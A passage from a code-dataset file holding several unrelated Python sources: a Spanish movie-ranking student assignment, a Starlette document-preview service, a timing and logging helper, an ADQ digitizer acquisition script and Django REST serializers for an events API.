\n return 0\n else:\n iterador=it.newIterator(lst)\n while it.hasNext(iterador):\n element = it.next(iterador)\n if criteria.lower() in element[column].lower():\n lt.addLast(peliculas_actor4,element[\"id\"])\n return peliculas_actor4\n\ndef peliculas_por_actor5(criteria, column, lst):\n peliculas_actor5 = lt.newList(\"ARRAY_LIST\",None)\n if len(lst)==0:\n print(\"La lista esta vacía\") \n return 0\n else:\n iterador=it.newIterator(lst)\n while it.hasNext(iterador):\n element = it.next(iterador)\n if criteria.lower() in element[column].lower():\n lt.addLast(peliculas_actor5,element[\"id\"])\n return peliculas_actor5\n\ndef conocer_actor(criteria, lstC, lstD): #Requerimiento 4\n t1_start = process_time()\n suma = 0\n peli_actor = lt.newList(\"ARRAY_LIST\", None)\n peliculas_actor = peliculas_por_actor1(criteria, \"actor1_name\", lstC)\n peliculas_actor2 = peliculas_por_actor2(criteria, \"actor2_name\", lstC)\n peliculas_actor3 = peliculas_por_actor3(criteria, \"actor3_name\", lstC)\n peliculas_actor4 = peliculas_por_actor4(criteria, \"actor4_name\", lstC)\n peliculas_actor5 = peliculas_por_actor5(criteria, \"actor5_name\", lstC)\n\n if (lstD[\"size\"]) == 0:\n print(\"La Lista esta vacía\")\n return 0\n \n else:\n iterador = it.newIterator(lstD)\n iterador2 = it.newIterator(lstC)\n while it.hasNext(iterador) and it.hasNext(iterador2):\n element = it.next(iterador)\n element2 = it.next(iterador2)\n if element[\"id\"] in peliculas_actor[\"elements\"]:\n suma = suma + float(element[\"vote_average\"])\n lt.addLast(peli_actor, element[\"original_title\"])\n lt.addLast(peli_actor, element2[\"director_name\"])\n elif element[\"id\"] in peliculas_actor2[\"elements\"]:\n suma = suma + float(element[\"vote_average\"])\n lt.addLast(peli_actor, element[\"original_title\"])\n lt.addLast(peli_actor, element2[\"director_name\"])\n elif element[\"id\"] in peliculas_actor3[\"elements\"]:\n suma = suma + float(element[\"vote_average\"])\n lt.addLast(peli_actor, element[\"original_title\"])\n lt.addLast(peli_actor, element2[\"director_name\"])\n elif element[\"id\"] in peliculas_actor4[\"elements\"]:\n suma = suma + float(element[\"vote_average\"])\n lt.addLast(peli_actor, element[\"original_title\"])\n lt.addLast(peli_actor, element2[\"director_name\"])\n elif element[\"id\"] in peliculas_actor5[\"elements\"]:\n suma = suma + float(element[\"vote_average\"])\n lt.addLast(peli_actor, element[\"original_title\"])\n lt.addLast(peli_actor, element2[\"director_name\"])\n\n prom = round((suma/peli_actor[\"size\"]),3)\n t1_stop = process_time()\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\")\n return (peli_actor, prom)\n\ndef entender_genero(criteria,column,lstD): #Requerimiento 5\n t1_start=process_time()#tiempo inicial\n sum_count=0\n lista_genero=lt.newList(\"ARRAY_LIST\",None)\n if lstD[\"size\"]==0:\n print(\"la lista esta vacía\")\n else:\n iterator=it.newIterator(lstD)\n while it.hasNext(iterator):\n element=it.next(iterator)\n if criteria.lower() in element[column].lower():\n lt.addLast(lista_genero,element[\"original_title\"])\n sum_count+=float((element[\"vote_average\"]))\n promedio=round((sum_count/lista_genero[\"size\"]),3)\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\")\n return (lista_genero,promedio)\n\ndef ranking_genero (lista_Details, genero, No_peliculas, criteria_r, criteria_o): #Requerimiento 6\n buscar_genero = lt.newList('SINGLE_LINKED', None)\n #------------------------------------\n\n t1_start = process_time() #Inicio de cronometro \n\n #Filtrar las peliculas por genero\n \n iter = it.newIterator(lista_Details)\n while it.hasNext(iter):\n c = it.next(iter)\n genero_separado = c[\"genres\"].split(\"|\")\n i = 0\n tam = len(genero_separado)\n \n while i < tam:\n \n if (genero_separado[i] == genero):\n lt.addFirst(buscar_genero, c)\n i += 1\n \n \n #Crear Ranking\n \n generos_ordenados = lt.newList('SINGLE_LINKED', None)\n PARAMETROS_NO = \"Parametro no valido\" #Variable para comprobar que todos los parametros hayan sido procesados\n cont = 0 #Variable para contar las peliculas\n mayor = lt.firstElement(buscar_genero)\n menor = lt.lastElement(buscar_genero)\n if lt.isEmpty(buscar_genero):\n print(\"No se encontraron peliculas de ese genero\")\n elif (criteria_o == \"ascendente\"and No_peliculas >= 10):\n \n \n if (criteria_r == \"count\"):\n ma = mayor[\"vote_count\"]\n me = menor[\"vote_count\"]\n print(ma)\n iter2 = it.newIterator(buscar_genero)\n \n while it.hasNext(iter2):\n d = it.next(iter2)\n \n if(int(d[\"vote_count\"]) >= int(ma)):\n lt.addFirst(generos_ordenados,d)\n ma = int(d[\"vote_count\"])\n if(int(d[\"vote_count\"]) <= int(me)):\n lt.addLast(generos_ordenados,d)\n me = int(d[\"vote_count\"])\n \n\n elif (criteria_r == \"average\"):\n ma = mayor[\"vote_average\"]\n me = menor[\"vote_average\"]\n print(ma)\n iter2 = it.newIterator(buscar_genero)\n \n while it.hasNext(iter2):\n d = it.next(iter2)\n \n if(float(d[\"vote_average\"]) >= float(ma)):\n lt.addFirst(generos_ordenados,d)\n ma = float(d[\"vote_average\"])\n if(float(d[\"vote_average\"]) <= float(me)):\n lt.addLast(generos_ordenados,d)\n me = float(d[\"vote_average\"])\n \n \n else:\n return PARAMETROS_NO\n\n elif (criteria_o == \"descendente\"and No_peliculas >= 10):\n \n if (criteria_r == \"count\"):\n ma = mayor[\"vote_count\"]\n me = menor[\"vote_count\"]\n print(ma)\n iter2 = it.newIterator(buscar_genero)\n \n while it.hasNext(iter2):\n d = it.next(iter2)\n \n if(int(d[\"vote_count\"]) >= int(ma)):\n lt.addLast(generos_ordenados,d)\n ma = int(d[\"vote_count\"])\n if(int(d[\"vote_count\"]) <= int(me)):\n lt.addFirst(generos_ordenados,d)\n me = int(d[\"vote_count\"])\n \n \n elif (criteria_r == \"average\"):\n ma = mayor[\"vote_average\"]\n me = menor[\"vote_average\"]\n print(ma)\n iter2 = it.newIterator(buscar_genero)\n \n while it.hasNext(iter2):\n d = it.next(iter2)\n \n if(float(d[\"vote_average\"]) >= float(ma)):\n lt.addLast(generos_ordenados,d)\n ma = float(d[\"vote_average\"])\n if(float(d[\"vote_average\"]) <= float(me)):\n lt.addFirst(generos_ordenados,d)\n me = float(d[\"vote_average\"])\n \n else:\n return PARAMETROS_NO\n else:\n return PARAMETROS_NO\n \n Peliculas_en_ranking = lt.size(generos_ordenados)\n Votos_totales = 0\n Votos_Promedio = 0.0\n \n #Imprimir ranking\n \n print(\"Película , Genero , Vote_Average , Vote_Count\")\n iterfinal = it.newIterator(generos_ordenados)\n while it.hasNext(iterfinal):\n\n f = it.next(iterfinal)\n if (cont == No_peliculas):\n break\n Votos_totales = Votos_totales + int(f[\"vote_count\"])\n Votos_Promedio = Votos_Promedio + float(f[\"vote_average\"])\n Pel = str(f[\"original_title\"])\n Gen = str(f[\"genres\"])\n Av = str(f[\"vote_average\"])\n Co = str(f[\"vote_count\"])\n\n print(Pel +\" I \"+ Gen +\" I \"+ Av +\" I \"+ Co)\n cont += 1\n\n Promedio = Votos_Promedio/Peliculas_en_ranking\n\n print(\"Promedio(Vote average): \" + str(Promedio))\n print(\"Votos totales: \" + str(Votos_totales))\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\")\n\n\ndef main():\n \"\"\"\n Método principal del programa, se encarga de manejar todos los metodos adicionales creados\n\n Instancia una lista vacia en la cual se guardarán los datos cargados desde el archivo\n Args: None\n Return: None \n \"\"\"\n lstmovies = {\"size\":0}\n while True:\n printMenu() #imprimir el menu de opciones en consola\n inputs =input('Seleccione una opción para continuar\\n') #leer opción ingresada\n if len(inputs)>0:\n if int(inputs[0])==1: #opcion 1\n lstmovies = loadMovies()\n lstdetails = loadDetails()\n\n elif int(inputs[0])==2: #opcion 2\n if lstmovies == None or lstmovies['size'] == 0: #obtener la longitud de la lista\n print(\"La lista esta vacía\")\n else: #(num_peli, v_p, as_des, elemento1, elemento2, lstD)\n num_peli = input('Ingrese el número de peliculas, mínimo 10: \\n')\n v_p = input(\"Ingrese la cantidad por la que se quiere ordenar (promedio o votos): \\n\")\n as_des = input(\"Ingrese el orden en el que se quiere ordenar (ascendente o descendente): \\n\")\n\n x = ranking_peliculas(num_peli, v_p, as_des, lstmovies) #filtrar una columna por criterio \n print(\"El ranking es el siguiente: \",x)\n\n elif int(inputs[0])==3: #opcion 3\n if lstmovies == None or lstmovies['size'] == 0 and lstdetails == None or lstdetails['size'] == 0: #obtener la longitud de la lista\n print(\"La lista esta vacía\")\n else: \n criteria = input('Ingrese el nombre del director: \\n')\n x = conocer_director(criteria, \"director_name\" ,lstmovies, lstdetails) #filtrar una columna por criterio \n print(\"Coinciden \",x,\" elementos con el director: \",criteria)\n\n elif int(inputs[0])==4: #opcion 4\n if lstdetails == None or lstdetails['size']==0 and lstmovies==None or lstmovies['size']==0: #obtener la longitud de la lista\n print(\"La lista esta vacía\")\n else: \n criteria = input('Ingrese el nombre del actor: \\n')\n x = conocer_actor(criteria,lstmovies, lstdetails) #filtrar una columna por criterio \n print(\"Coinciden \",x,\" elementos con el actor: \",criteria)\n elif int(inputs[0])==5: #opcion 5\n if lstmovies == None or lstmovies['size'] == 0 and lstdetails == None or lstdetails['size'] == 0: #obtener la longitud de la lista\n print(\"La lista esta vacía\")\n else: \n criteria = input('Ingrese el género: \\n')\n x = entender_genero(criteria, \"genres\" ,lstdetails) #filtrar una columna por criterio \n print(\"Coinciden \",x,\" elementos con el género: \",criteria)\n\n elif int(inputs[0])==6: #opcion 6\n if lstdetails == None or lstdetails['size'] == 0: #obtener la longitud de la lista\n print(\"La lista esta vacía\")\n else:\n genero = input(\"Ingrese el nombre del genero:\\n\")\n No_peliculas = int(input(\"Ingrese el número de películas (Mínimo 10):\\n\"))#------------------------------------\n criteria_r = input(\"Ingrese el criterio del ranking (count o average)::\\n\")#------------------------------------\n criteria_o = input(\"Ingrese el criterio de ordenamiento (ascendente o descendente):\\n\")#------------------------------------\n x = ranking_genero(lstdetails, genero, No_peliculas, criteria_r, criteria_o)\n print(\"Gracias\")\n\n elif int(inputs[0])==0: #opcion 0, salir\n print(\"Vuelva pronto\")\n sys.exit(0)\n \nif __name__ == \"__main__\":\n main()","sub_path":"App/reto.py","file_name":"reto.py","file_ext":"py","file_size_in_byte":21315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"556232834","text":"import os\nimport hashlib\n\nfrom starlette.applications import Starlette\nfrom starlette.routing import Route\nfrom starlette.requests import Request\nfrom starlette.responses import FileResponse, PlainTextResponse\n\nfrom preview_generator.manager import PreviewManager\n\n\nUPLOAD_DIR = '/tmp/files/'\nCACHE_PATH = '/tmp/cache/'\n\n\nmanager = PreviewManager(CACHE_PATH, create_folder=True)\n\n\nasync def _store_uploaded_file(file) -> str:\n contents = await file.read()\n h = hashlib.md5(contents).hexdigest()\n upload_dest = os.path.join(UPLOAD_DIR, h)\n\n with open(upload_dest, 'wb') as f:\n f.write(contents)\n\n return upload_dest\n\n\nasync def health_endpoint(request):\n return PlainTextResponse('OK')\n\n\nasync def preview_endpoint(request):\n width = request.path_params['width']\n height = request.path_params['height']\n\n form = await request.form()\n file_path = await _store_uploaded_file(form['file'])\n\n image = manager.get_jpeg_preview(file_path, width=width, height=height)\n\n return FileResponse(image)\n\n\napp = Starlette(routes=[\n Route('/', endpoint=health_endpoint),\n Route('/preview/{width:int}x{height:int}',\n endpoint=preview_endpoint, methods=['POST']),\n])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"345786144","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 28 10:52:11 2018\n\n@author: Niels\n\"\"\"\n\ndef Timer(iteration_variable,itr=1,t=[0],itr_show=1):\n import time\n if itr_show==1: \n print('\\rIteration {} of {}'.format(iteration_variable+1, itr), end='') \n if iteration_variable==1:\n itr=itr-1\n timed=time.time()-t[0] # calculate an estimate of total run time before done\n mins=int((itr*timed)/60)\n secs=int((itr*timed)%60)\n print(\"\\rEstimate until done: {} minutes {} seconds\".format(mins,secs))\n t[0]=0\n elif iteration_variable==0 and itr!=1: \n t[0]+=time.time()\n return\n\ndef cont_timer(start_time,stop,printing=0):\n import time\n if stop==1:\n timed=time.time()-start_time # calculate an estimate of total run time before done\n if printing==1:\n print(\"\\n\")\n print(\"{} ms\".format(int(timed*1000)))\n return int(timed*1000)\n if stop==0:\n return time.time()\n \ndef log(data,file_name=\"output.txt\",log_s='0',open_file=0):\n if open_file==1:\n with open(file_name, 'a') as f:\n f.write(\"\\n\")\n f.write(log_s)\n f.write(\"\\n\")\n f.write(\"[\")\n if open_file==-1:\n with open(file_name, 'a') as f:\n f.write(str(data))\n f.write(\"]\")\n f.write('\\n')\n f.close()\n if open_file==0:\n with open(file_name, 'a') as f:\n f.write(str(data))\n f.write(\", \") ","sub_path":"project_code/J/N_timer.py","file_name":"N_timer.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"372496620","text":"import numpy as np\nimport ctypes as ct\nimport matplotlib.pyplot as plt\nimport time\n# For Python under Linux\n#ADQAPI = ct.cdll.LoadLibrary(\"libadq.so\")\n# For Python under Windows\nADQAPI = ct.cdll.LoadLibrary(\"ADQAPI.dll\")\nADQAPI.ADQAPI_GetRevision()\n\n# Manually set return type from some ADQAPI functions\nADQAPI.CreateADQControlUnit.restype = ct.c_void_p\nADQAPI.ADQ_GetRevision.restype = ct.c_void_p\nADQAPI.ADQ_GetPtrStream.restype = ct.POINTER(ct.c_int16)\nADQAPI.ADQControlUnit_FindDevices.argtypes = [ct.c_void_p]\n\n# Create ADQControlUnit\nadq_cu = ct.c_void_p(ADQAPI.CreateADQControlUnit())\nADQAPI.ADQControlUnit_EnableErrorTrace(adq_cu, 3, '.')\nadq_num = 1\n\n# Convenience function\ndef adq_status(status):\n if (status==0):\n return 'FAILURE'\n else:\n return 'OK' \n\n# Find ADQ devices\nADQAPI.ADQControlUnit_FindDevices(adq_cu)\nn_of_ADQ = ADQAPI.ADQControlUnit_NofADQ(adq_cu)\nprint('Number of ADQ found: {}'.format(n_of_ADQ))\n\nif n_of_ADQ < 2:\n print('Failed to find two devices, aborting ...')\nelse:\n for adq_num in range(1, n_of_ADQ+1):\n # Get revision info from ADQ\n rev = ADQAPI.ADQ_GetRevision(adq_cu, adq_num)\n revision = ct.cast(rev, ct.POINTER(ct.c_int))\n print('Connected to ADQ {}'.format(adq_num))\n # Print revision information\n print('FPGA Revision: {}'.format(revision[0]))\n if (revision[1]):\n print('Local copy')\n else:\n print('SVN Managed')\n if (revision[2]):\n print('Mixed Revision')\n else:\n print('SVN Updated')\n print('')\n\n # Set clock source\n ADQ_CLOCK_INT_INTREF = 0\n ADQ_CLOCK_INT_EXTREF = 1\n ADQ_CLOCK_EXT = 2\n ADQ_CLOCK_INT_PXIREF = 3\n clock_source = ADQ_CLOCK_INT_EXTREF # Choose an external 10Mhz clock as the common reference\n success = ADQAPI.ADQ_SetClockSource(adq_cu, adq_num, clock_source)\n if (success == 0):\n print('ADQ_SetClockSource failed.')\n\n # Set trig mode\n SW_TRIG = 1\n EXT_TRIG = 2\n LVL_TRIG = 3\n INT_TRIG = 4\n EXT_SYNC = 9\n trigger = EXT_TRIG # Set as external trig\n success = ADQAPI.ADQ_SetTriggerMode(adq_cu, adq_num, trigger)\n if (success == 0):\n print('ADQ_SetTriggerMode failed.')\n\n # Reset timestamp counter\n SYN_ONCE = 0 # Synchronize only on the first trigger event\n SYN_EACH_TRIG = 1 # synchronize on all trigger events (until disarmed)\n syn_mode = SYN_ONCE\n trig_source = EXT_TRIG # TRIG connector as the source for timestamp counter reset\n success = ADQAPI.ADQ_DisarmTimestampSync(adq_cu, adq_num)\n success = ADQAPI.ADQ_SetupTimestampSync(adq_cu, adq_num, syn_mode, trig_source)\n success = ADQAPI.ADQ_ArmTimestampSync(adq_cu, adq_num)\n if (success == 0):\n print('ADQ_SetupTimestampSync failed.')\n\n # Reduce sampling rate\n # decimation_factor = 4\n # success = ADQAPI.ADQ_SetSampleSkip(adq_cu, adq_num, decimation_factor)\n\n number_of_records = 1\n samples_per_record = 1 * 10 ** 6\n\n ADQAPI.ADQ_MultiRecordSetup(adq_cu, adq_num,number_of_records,samples_per_record)\n\n sleep_time = 5\n print('Waiting {} seconds for external trigger to reset the timestamp counter'.format(sleep_time))\n time.sleep(sleep_time)\n\n num_snapshot = 31\n for snapshot in range(1,num_snapshot+1):\n print('\\nStarting collection with Snapshot {}'.format(snapshot))\n\n # Enable trigger\n for adq_num in range(1,n_of_ADQ+1):\n ADQAPI.ADQ_DisarmTrigger(adq_cu, adq_num)\n ADQAPI.ADQ_ArmTrigger(adq_cu, adq_num)\n\n # Data acquisition and transfer\n for adq_num in range(1, n_of_ADQ + 1):\n while (ADQAPI.ADQ_GetAcquiredAll(adq_cu, adq_num) == 0):\n if (trigger == SW_TRIG):\n ADQAPI.ADQ_SWTrig(adq_cu, adq_num)\n # print('Waiting for trigger')\n\n # Setup target buffers for data\n max_number_of_channels = ADQAPI.ADQ_GetNofChannels(adq_cu, adq_num)\n print('Number of channels: {}'.format(max_number_of_channels))\n target_buffers = (ct.POINTER(ct.c_int16 * samples_per_record * number_of_records) * max_number_of_channels)()\n for bufp in target_buffers:\n bufp.contents = (ct.c_int16 * samples_per_record * number_of_records)()\n target_timestamps = (ct.POINTER(ct.c_ulonglong * number_of_records))()\n target_timestamps.contents = (ct.c_ulonglong * number_of_records)()\n\n # Get data from ADQ\n ADQ_TRANSFER_MODE_NORMAL = 0\n ADQ_CHANNELS_MASK = 0xFF\n status = ADQAPI.ADQ_GetDataWHTS(adq_cu, adq_num, target_buffers, 0, target_timestamps,\n samples_per_record * number_of_records , 2,\n 0, number_of_records, ADQ_CHANNELS_MASK,\n 0, samples_per_record, ADQ_TRANSFER_MODE_NORMAL)\n print('ADQ_GetData returned {}'.format(adq_status(status)))\n\n # Re-arrange data in numpy arrays\n data_16bit_ch0 = np.frombuffer(target_buffers[0].contents[0], dtype=np.int16)\n data_16bit_ch1 = np.frombuffer(target_buffers[1].contents[0], dtype=np.int16)\n tstamp_64bit_rec0 = np.frombuffer(target_timestamps.contents, dtype=np.ulonglong)\n print('ADQ {} Timestamp is {}' .format(adq_num, tstamp_64bit_rec0[0]))\n\n # Plot data\n # if True:\n # plt.figure(0)\n # plt.clf()\n # plt.plot(data_16bit_ch0[:500], '.-')\n # # plt.plot(data_16bit_ch1[:1000], '.--')\n #\n # plt.figure(1)\n # plt.clf()\n # plt.plot(data_16bit_ch0[-500:], '.-')\n # # plt.plot(data_16bit_ch1[-1000:],'.--')\n #\n # plt.show()\n\n # Only disarm trigger after all data snapshots are collected\n ADQAPI.ADQ_DisarmTrigger(adq_cu, adq_num)\n ADQAPI.ADQ_MultiRecordClose(adq_cu, adq_num)\n\n # Delete ADQControlunit\n ADQAPI.DeleteADQControlUnit(adq_cu)\n\n print('Done')\n\n\n# This can be used to completely unload the DLL in Windows\n#ct.windll.kernel32.FreeLibrary(ADQAPI._handle)\n","sub_path":"ADQ-PYTHON/ADQ_multirecord_sync_timestamp.py","file_name":"ADQ_multirecord_sync_timestamp.py","file_ext":"py","file_size_in_byte":6388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"61399171","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom functools import wraps\nfrom datetime import datetime, timedelta\nfrom pprint import pprint\n\nfrom django.utils import translation\nfrom django.contrib.gis.geos import Point\nfrom django.core.exceptions import ValidationError\nfrom django.core.urlresolvers import NoReverseMatch\nfrom django.utils.datastructures import MultiValueDictKeyError\nfrom django.contrib.gis.db.models.fields import GeometryField\nfrom django.db import models as django_db_models\nfrom django.db.models import Q, F\nfrom isodate import Duration, duration_isoformat, parse_duration\nfrom rest_framework import serializers, pagination, relations, viewsets, filters, generics, fields\nfrom rest_framework.reverse import reverse\nfrom rest_framework.response import Response\nfrom rest_framework.exceptions import ParseError\nfrom events.models import Place, Event, Keyword, Language, OpeningHoursSpecification, EventLink\nfrom django.conf import settings\nfrom events import utils\nfrom events.custom_elasticsearch_search_backend import CustomEsSearchQuerySet as SearchQuerySet\nfrom modeltranslation.translator import translator, NotRegistered\nfrom django.utils.translation import ugettext_lazy as _\nfrom dateutil.parser import parse as dateutil_parse\nfrom haystack.query import AutoQuery\n\nfrom munigeo.api import GeoModelSerializer, GeoModelAPIView, build_bbox_filter, srid_to_srs\n\nimport pytz\n\n\nserializers_by_model = {}\n\nall_views = []\ndef register_view(klass, name, base_name=None):\n entry = {'class': klass, 'name': name}\n if base_name is not None:\n entry['base_name'] = base_name\n all_views.append(entry)\n\n if klass.serializer_class and hasattr(klass.serializer_class.Meta, 'model'):\n model = klass.serializer_class.Meta.model\n serializers_by_model[model] = klass.serializer_class\n\n\nclass CustomPaginationSerializer(pagination.PaginationSerializer):\n results_field = 'data'\n def to_native(self, obj):\n ret = super(CustomPaginationSerializer, self).to_native(obj)\n meta_fields = ['count', 'next', 'previous']\n meta = {}\n for f in meta_fields:\n meta[f] = ret[f]\n del ret[f]\n ret['meta'] = meta\n if False: # FIXME: Check for JSON-LD\n try:\n ret['@context'] = obj.object_list.model.jsonld_context\n except (NameError, AttributeError):\n ret['@context'] = 'http://schema.org'\n pass\n return ret\n\n\nclass JSONLDRelatedField(relations.HyperlinkedRelatedField):\n \"\"\"\n Support of showing and saving of expanded JSON nesting or just a resource\n URL.\n Serializing is controlled by query string param 'expand', deserialization\n by format of JSON given.\n\n Default serializing is expand=true.\n \"\"\"\n\n invalid_json_error = _('Incorrect JSON. Expected JSON, received %s.')\n\n def __init__(self, *args, **kwargs):\n self.related_serializer = kwargs.pop('serializer', None)\n self.hide_ld_context = kwargs.pop('hide_ld_context', False)\n super(JSONLDRelatedField, self).__init__(*args, **kwargs)\n\n def to_native(self, obj):\n if self.is_expanded():\n return self.related_serializer(obj, hide_ld_context=self.hide_ld_context,\n context=self.context).data\n link = super(JSONLDRelatedField, self).to_native(obj)\n return {\n '@id': link\n }\n\n def from_native(self, value):\n if '@id' in value:\n return super(JSONLDRelatedField, self).from_native(value['@id'])\n else:\n raise ValidationError(\n self.invalid_json_error % type(value).__name__)\n\n def is_expanded(self):\n return getattr(self, 'expanded', False)\n\n\nclass EnumChoiceField(serializers.WritableField):\n \"\"\"\n Database value of tinyint is converted to and from a string representation\n of choice field.\n\n TODO: Find if there's standardized way to render Schema.org enumeration\n instances in JSON-LD.\n \"\"\"\n\n def __init__(self, choices, prefix=''):\n self.choices = choices\n self.prefix = prefix\n super(EnumChoiceField, self).__init__()\n\n def to_native(self, obj):\n if obj == None:\n return None\n return self.prefix + utils.get_value_from_tuple_list(self.choices,\n obj, 1)\n\n def from_native(self, data):\n return utils.get_value_from_tuple_list(self.choices,\n self.prefix + data, 0)\n\n\nclass ISO8601DurationField(serializers.WritableField):\n def to_native(self, obj):\n if obj:\n d = Duration(milliseconds=obj)\n return duration_isoformat(d)\n else:\n return None\n\n def from_native(self, data):\n if data:\n value = parse_duration(data)\n return (\n value.days * 24 * 3600 * 1000000\n + value.seconds * 1000\n + value.microseconds / 1000\n )\n else:\n return 0\n\n\nclass MPTTModelSerializer(serializers.ModelSerializer):\n def __init__(self, *args, **kwargs):\n super(MPTTModelSerializer, self).__init__(*args, **kwargs)\n for field_name in 'lft', 'rght', 'tree_id', 'level':\n if field_name in self.fields:\n del self.fields[field_name]\n\n\nclass TranslatedModelSerializer(serializers.ModelSerializer):\n def __init__(self, *args, **kwargs):\n super(TranslatedModelSerializer, self).__init__(*args, **kwargs)\n model = self.opts.model\n try:\n trans_opts = translator.get_options_for_model(model)\n except NotRegistered:\n self.translated_fields = []\n return\n\n self.translated_fields = trans_opts.fields.keys()\n lang_codes = [x[0] for x in settings.LANGUAGES]\n # Remove the pre-existing data in the bundle.\n for field_name in self.translated_fields:\n for lang in lang_codes:\n key = \"%s_%s\" % (field_name, lang)\n if key in self.fields:\n del self.fields[key]\n del self.fields[field_name]\n\n def get_field(self, model_field):\n kwargs = {}\n if issubclass(\n model_field.__class__,\n (django_db_models.CharField,\n django_db_models.TextField)):\n if model_field.null:\n kwargs['allow_none'] = True\n kwargs['max_length'] = getattr(model_field, 'max_length')\n return fields.CharField(**kwargs)\n return super(TranslatedModelSerializer, self).get_field(model_field)\n\n def to_native(self, obj):\n ret = super(TranslatedModelSerializer, self).to_native(obj)\n if obj is None:\n return ret\n return self.translated_fields_to_native(obj, ret)\n\n def translated_fields_to_native(self, obj, ret):\n for field_name in self.translated_fields:\n d = {}\n default_lang = settings.LANGUAGES[0][0]\n d[default_lang] = getattr(obj, field_name)\n for lang in [x[0] for x in settings.LANGUAGES[1:]]:\n key = \"%s_%s\" % (field_name, lang) \n val = getattr(obj, key, None)\n if val == None:\n continue \n d[lang] = val\n\n # If no text provided, leave the field as null\n for key, val in d.items():\n if val != None:\n break\n else:\n d = None\n ret[field_name] = d\n\n return ret\n\n\nclass LinkedEventsSerializer(TranslatedModelSerializer, MPTTModelSerializer):\n \"\"\"Serializer with the support for JSON-LD/Schema.org.\n\n JSON-LD/Schema.org syntax::\n\n {\n \"@context\": \"http://schema.org\",\n \"@type\": \"Event\",\n \"name\": \"Event name\",\n ...\n }\n\n See full example at: http://schema.org/Event\n\n Args:\n hide_ld_context (bool):\n Hides `@context` from JSON, can be used in nested\n serializers\n \"\"\"\n\n def __init__(self, instance=None, data=None, files=None,\n context=None, partial=False, many=None,\n allow_add_remove=False, hide_ld_context=False, **kwargs):\n super(LinkedEventsSerializer, self).__init__(instance, data, files,\n context, partial, many,\n allow_add_remove,\n **kwargs)\n if 'created_by' in self.fields:\n del self.fields['created_by']\n if 'modified_by' in self.fields:\n del self.fields['modified_by']\n\n if context is not None:\n include_fields = context.get('include', [])\n for field_name in include_fields:\n if not field_name in self.fields:\n continue\n field = self.fields[field_name]\n if not isinstance(field, JSONLDRelatedField):\n continue\n field.expanded = True\n\n self.hide_ld_context = hide_ld_context\n\n self.disable_camelcase = True\n if 'request' in self.context:\n request = self.context['request']\n if 'disable_camelcase' in request.QUERY_PARAMS:\n self.disable_camelcase = True\n\n def to_native(self, obj):\n \"\"\"\n Before sending to renderer there's a need to do additional work on\n to-be-JSON dictionary data:\n 1. Add @context, @type and @id fields\n 2. Convert field names to camelCase\n Renderer is the right place for this but now loop is done just once.\n Reversal conversion is done in parser.\n \"\"\"\n ret = super(LinkedEventsSerializer, self).to_native(obj)\n if 'id' in ret and 'request' in self.context:\n try:\n ret['@id'] = reverse(self.view_name,\n kwargs={u'pk': ret['id']},\n request=self.context['request'])\n except NoReverseMatch:\n ret['@id'] = str(value)\n\n # Context is hidden if:\n # 1) hide_ld_context is set to True\n # 2) self.object is None, e.g. we are in the list of stuff\n if not self.hide_ld_context and self.object is not None:\n if hasattr(obj, 'jsonld_context') \\\n and isinstance(obj.jsonld_context, (dict, list)):\n ret['@context'] = obj.jsonld_context\n else:\n ret['@context'] = 'http://schema.org'\n\n # Use jsonld_type attribute if present,\n # if not fallback to automatic resolution by model name.\n # Note: Plan 'type' could be aliased to @type in context definition to\n # conform JSON-LD spec.\n if hasattr(obj, 'jsonld_type'):\n ret['@type'] = obj.jsonld_type\n else:\n ret['@type'] = obj.__class__.__name__\n\n return ret\n\n\nclass KeywordSerializer(LinkedEventsSerializer):\n view_name = 'keyword-detail'\n\n class Meta:\n model = Keyword\n\nclass KeywordViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = Keyword.objects.all()\n serializer_class = KeywordSerializer\n\nregister_view(KeywordViewSet, 'keyword')\n\n\nclass PlaceSerializer(LinkedEventsSerializer, GeoModelSerializer):\n view_name = 'place-detail'\n\n class Meta:\n model = Place\n\n\nclass PlaceViewSet(GeoModelAPIView, viewsets.ReadOnlyModelViewSet):\n queryset = Place.objects.all()\n serializer_class = PlaceSerializer\n pagination_serializer_class = CustomPaginationSerializer\n\n\nregister_view(PlaceViewSet, 'place')\n\n\nclass OpeningHoursSpecificationSerializer(LinkedEventsSerializer):\n class Meta:\n model = OpeningHoursSpecification\n\n\nclass LanguageSerializer(LinkedEventsSerializer):\n view_name = 'language-detail'\n\n class Meta:\n model = Language\n\n\nclass LanguageViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = Language.objects.all()\n serializer_class = LanguageSerializer\n\nregister_view(LanguageViewSet, 'language')\n\nLOCAL_TZ = pytz.timezone(settings.TIME_ZONE)\n\nclass EventLinkSerializer(serializers.ModelSerializer):\n def to_native(self, obj):\n ret = super(EventLinkSerializer, self).to_native(obj)\n if not ret['name']:\n ret['name'] = None\n return ret\n\n class Meta:\n model = EventLink\n exclude = ['id']\n\nclass EventSerializer(LinkedEventsSerializer, GeoModelAPIView):\n location = JSONLDRelatedField(serializer=PlaceSerializer, required=False,\n view_name='place-detail')\n # provider = OrganizationSerializer(hide_ld_context=True)\n keywords = JSONLDRelatedField(serializer=KeywordSerializer, many=True, required=False,\n view_name='keyword-detail')\n super_event = JSONLDRelatedField(required=False, view_name='event-detail')\n event_status = EnumChoiceField(Event.STATUSES)\n external_links = EventLinkSerializer(many=True)\n\n view_name = 'event-detail'\n\n def to_native(self, obj):\n ret = super(EventSerializer, self).to_native(obj)\n if 'start_time' in ret and not obj.has_start_time:\n # Return only the date part\n ret['start_time'] = obj.start_time.astimezone(LOCAL_TZ).strftime('%Y-%m-%d')\n if 'end_time' in ret and not obj.has_end_time:\n # If we're storing only the date part, do not pretend we have the exact time.\n if obj.end_time - 